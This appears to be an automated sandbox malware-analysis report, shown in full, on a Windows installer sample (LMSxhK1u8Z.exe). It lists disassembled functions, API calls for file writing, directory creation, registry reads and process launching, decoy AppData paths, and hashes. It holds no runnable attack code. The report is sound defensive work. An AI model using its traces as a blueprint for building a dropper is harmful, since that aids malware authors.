                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic$Generic$Heteric
                                                                                                • API String ID: 1941528284-2039653899
                                                                                                • Opcode ID: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                                                                • Instruction ID: d3e4dca81327e3df0df284c572be3abc4bccaf2f3cb66fe1cef89d7a827d5624
                                                                                                • Opcode Fuzzy Hash: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                                                                • Instruction Fuzzy Hash: 9B419171900505BBCF10BBB5DC8ADAF3665EF06369B20823BF012B11E1D63C8A519A6D
                                                                                                Function 00402F38 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 175fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 606 402f38-402f51 607 402f53 606->607 608 402f5a-402f62 606->608 607->608 609 402f64 608->609 610 402f6b-402f70 608->610 609->610 611 402f80-402f8d call 403160 610->611 612 402f72-402f7b call 403192 610->612 616 402f93-402f97 611->616 617 40310d 611->617 612->611 618 4030f6-4030f8 616->618 619 402f9d-402fe4 GetTickCount 616->619 620 40310f-403110 617->620 621 4030fa-4030fd 618->621 622 40314c-40314f 618->622 623 403156 619->623 624 402fea-402ff2 619->624 625 403159-40315d 620->625 628 403102-40310b call 403160 621->628 629 4030ff 621->629 626 403151 622->626 627 403112-403118 622->627 623->625 630 402ff4 624->630 631 402ff7-403005 call 403160 624->631 626->623 634 40311a 627->634 635 40311d-40312b call 403160 627->635 628->617 641 403153 628->641 629->628 630->631 631->617 639 40300b-403014 631->639 634->635 635->617 643 40312d-40313f WriteFile 635->643 642 40301a-40303a call 4061cc 639->642 641->623 649 403040-403053 GetTickCount 642->649 650 4030ee-4030f0 642->650 645 403141-403144 643->645 646 4030f2-4030f4 643->646 645->646 648 403146-403149 645->648 646->620 648->622 651 403055-40305d 649->651 652 40309e-4030a2 649->652 650->620 653 403065-403096 MulDiv wsprintfW call 404ffa 651->653 654 40305f-403063 651->654 655 4030e3-4030e6 652->655 656 4030a4-4030a7 652->656 662 40309b 653->662 654->652 654->653 655->624 657 4030ec 655->657 659 4030c9-4030d4 656->659 660 4030a9-4030bd WriteFile 656->660 657->623 661 4030d7-4030db 659->661 660->646 663 4030bf-4030c2 660->663 661->642 664 4030e1 661->664 662->652 663->646 665 4030c4-4030c7 663->665 664->623 665->661
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402FA3
                                                                                                • GetTickCount.KERNEL32 ref: 00403048
                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
                                                                                                • wsprintfW.USER32 ref: 00403084
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0041C0DD,00402ED2,00000000), ref: 004030B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                • String ID: ... %d%%$znA
                                                                                                • API String ID: 4209647438-2447772013
                                                                                                • Opcode ID: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                                                                • Instruction ID: 34a6cf203725df572fb249859d8c599c0d8718bcf9279d6af528d8a937ec08d1
                                                                                                • Opcode Fuzzy Hash: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                                                                • Instruction Fuzzy Hash: 53617B71901219EBCB10DFA5DA4469F7FB8AF08355F10453BE914BB2C0D7789E40DBA9
                                                                                                Function 00404FFA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 666 404ffa-40500f 667 405015-405026 666->667 668 4050c6-4050ca 666->668 669 405031-40503d lstrlenW 667->669 670 405028-40502c call 405d68 667->670 672 40505a-40505e 669->672 673 40503f-40504f lstrlenW 669->673 670->669 675 405060-405067 SetWindowTextW 672->675 676 40506d-405071 672->676 673->668 674 405051-405055 lstrcatW 673->674 674->672 675->676 677 405073-4050b5 SendMessageW * 3 676->677 678 4050b7-4050b9 676->678 677->678 678->668 679 4050bb-4050be 678->679 679->668
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                                • lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                                • lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,74DF23A0), ref: 00405055
                                                                                                • SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID: Frisurens
                                                                                                • API String ID: 2531174081-3121014363
                                                                                                • Opcode ID: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                                                                • Instruction ID: 2c8a209b838051fcdbb8fb1d9598827595890bd21b84812adf7dff8cdb9255f5
                                                                                                • Opcode Fuzzy Hash: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                                                                • Instruction Fuzzy Hash: E1216071900618BADB219F65DD859DFBFB9EF45750F14803AF904B62A0C3794A40CF98
                                                                                                Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 680 4015b9-4015cd call 402ad0 call 405859 685 401614-401617 680->685 686 4015cf-4015eb call 4057db CreateDirectoryW 680->686 687 401646-402195 call 401423 685->687 688 401619-401638 call 401423 call 405d46 SetCurrentDirectoryW 685->688 693 40160a-401612 686->693 694 4015ed-4015f8 GetLastError 686->694 702 402729-402730 687->702 703 40295d-40296c 687->703 688->703 704 40163e-401641 688->704 693->685 693->686 697 401607 694->697 698 4015fa-401605 GetFileAttributesW 694->698 697->693 698->693 698->697 702->703 704->703
                                                                                                APIs
                                                                                                  • Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 00405867
                                                                                                  • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
                                                                                                  • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884
                                                                                                • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic,?,00000000,000000F0), ref: 00401630
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic, xrefs: 00401623
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic
                                                                                                • API String ID: 3751793516-3586988424
                                                                                                • Opcode ID: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                                                                • Instruction ID: 35652dd05d7f301adf099aa328e5cc987f695832d4750e36514a93e4da09e5cd
                                                                                                • Opcode Fuzzy Hash: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                                                                • Instruction Fuzzy Hash: B9113231600115EBCB206FA0DD44AAE3BB0EF053A9B24053BF882B22E0D6394981DB5D
                                                                                                Function 00405C13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 707 405c13-405c45 RegOpenKeyExW 708 405c87-405c8a 707->708 709 405c47-405c66 RegQueryValueExW 707->709 710 405c74 709->710 711 405c68-405c6c 709->711 712 405c77-405c81 RegCloseKey 710->712 711->712 713 405c6e-405c72 711->713 712->708 713->710 713->712
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C3D
                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C5E
                                                                                                • RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: : Completed
                                                                                                • API String ID: 3677997916-2954849223
                                                                                                • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                                                • Instruction ID: 00e721c797755c7836c6f4ed3256767801ec87f36bc61f3e3d0d9508cf2ebacd
                                                                                                • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                                                • Instruction Fuzzy Hash: 2B015A3114020EEADF218F16ED08EEB3BA8EF45394F00403AF944D6220D735D964CFA9
                                                                                                Function 004059FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 714 4059fe-405a0a 715 405a0b-405a3f GetTickCount GetTempFileNameW 714->715 716 405a41-405a43 715->716 717 405a4e-405a50 715->717 716->715 718 405a45 716->718 719 405a48-405a4b 717->719 718->719
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00405A1C
                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                • API String ID: 1716503409-678247507
                                                                                                • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                                                • Instruction ID: 8deae68b39d669cdf42b1d89707a3c20f7c4236b9c4ece7c5e704d7c998737b8
                                                                                                • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                                                • Instruction Fuzzy Hash: 18F03076710204BBDB008F59DD45E9FB7ACFBD5710F11803AEA45E7290E6B0AA548F64
                                                                                                Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 720 401e51-401e62 call 402ad0 call 404ffa call 4054c8 726 401e67-401e6c 720->726 727 401e72-401e75 726->727 728 402729-402730 726->728 730 401ec6-401ecf CloseHandle 727->730 731 401e77-401e87 WaitForSingleObject 727->731 729 40295d-40296c 728->729 730->728 730->729 733 401e97-401e99 731->733 734 401e89-401e95 call 4060e9 WaitForSingleObject 733->734 735 401e9b-401eab GetExitCodeProcess 733->735 734->733 737 401eba-401ebd 735->737 738 401ead-401eb8 call 405c8d 735->738 737->730 742 401ebf 737->742 738->730 742->730
                                                                                                APIs
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                                  • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,74DF23A0), ref: 00405055
                                                                                                  • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                                  • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                                                  • Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 3585118688-0
                                                                                                • Opcode ID: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                                                                • Instruction ID: a0a11ceaad45723ae58f2ff6d071e31bf4f47f747fba83561e840ebc81ce61f1
                                                                                                • Opcode Fuzzy Hash: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                                                                • Instruction Fuzzy Hash: D711A131A00205EBDF109FA0CD449DE7AB1EF44315F24413BE605B61E0C7798A92DB99
                                                                                                Function 004054C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 744 4054c8-4054f5 CreateProcessW 745 405503-405504 744->745 746 4054f7-405500 CloseHandle 744->746 746->745
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                                                • CloseHandle.KERNEL32(?), ref: 004054FA
                                                                                                Strings
                                                                                                • Error launching installer, xrefs: 004054DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
